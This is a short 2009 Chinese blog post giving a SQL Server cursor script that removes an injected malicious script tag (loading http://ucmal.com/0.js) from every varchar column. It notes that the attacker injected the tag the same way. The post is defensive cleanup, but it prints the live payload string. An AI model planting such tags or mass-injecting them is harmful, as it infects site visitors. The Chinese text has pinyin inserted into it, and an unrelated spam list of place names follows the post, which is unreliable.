游標(biāo)刪除注入代碼

          DECLARE @fieldtype sysname
          SET @fieldtype='varchar'

          --刪除處理
          DECLARE hCForEach CURSOR GLOBAL
          FOR
          SELECT N'update '+QUOTENAME(o.name)
             
          +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
          FROM sysobjects o,syscolumns c,systypes t
          WHERE o.id=c.id
             
          AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
             
          AND c.xusertype=t.xusertype
             
          AND t.name=@fieldtype
          EXEC sp_MSforeach_Worker @command1=N'?'

          其實(shí)他也是這樣注入的

          posted on 2009-04-25 10:54 sanmao 閱讀(74) 評(píng)論(0)  編輯  收藏

          只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。


          網(wǎng)站導(dǎo)航:
           

          常用鏈接

          留言簿(5)

          隨筆分類

          隨筆檔案

          搜索

          •  

          最新評(píng)論

          閱讀排行榜

          評(píng)論排行榜

          主站蜘蛛池模板: 界首市| 清河县| 松阳县| 五原县| 汾西县| 乡城县| 潜江市| 双鸭山市| 汶川县| 巴里| 黄山市| 云浮市| 彝良县| 交口县| 白山市| 奉新县| 黄山市| 乌审旗| 舟曲县| 馆陶县| 雅江县| 信丰县| 五台县| 玛沁县| 衡南县| 凌海市| 玉龙| 赤水市| 镶黄旗| 吴川市| 嘉荫县| 双流县| 和顺县| 金寨县| 长武县| 山东| 无为县| 南召县| 唐河县| 东兴市| 永靖县|